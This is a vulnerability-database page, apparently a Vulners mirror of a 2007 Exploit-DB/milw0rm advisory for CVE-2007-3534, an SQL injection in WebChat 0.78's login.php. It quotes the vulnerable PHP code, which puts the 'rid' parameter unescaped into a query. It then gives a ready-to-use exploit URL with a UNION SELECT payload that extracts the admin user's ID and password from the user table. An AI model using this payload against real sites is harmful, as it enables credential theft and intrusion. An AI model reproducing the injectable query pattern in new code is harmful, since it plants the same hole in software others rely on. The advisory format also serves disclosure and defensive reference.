Lucene search
+L

WebChat 0.78 - 'login.php?rid' SQL Injection

🗓️ 28 Jun 2007 00:00:00Reported by r00tType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

WebChat 0.78 SQL Injection vulnerability in login.php allows remote data extraction.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-3534
3 Jul 200720:00
cve
cvelist
Cvelist
CVE-2007-3534
3 Jul 200720:00
cvelist
euvd
EUVD
EUVD-2007-3518
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-3534
3 Jul 200720:30
nvd
prion
Prion
Sql injection
3 Jul 200720:30
prion
#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    r00t
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

               Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01061
25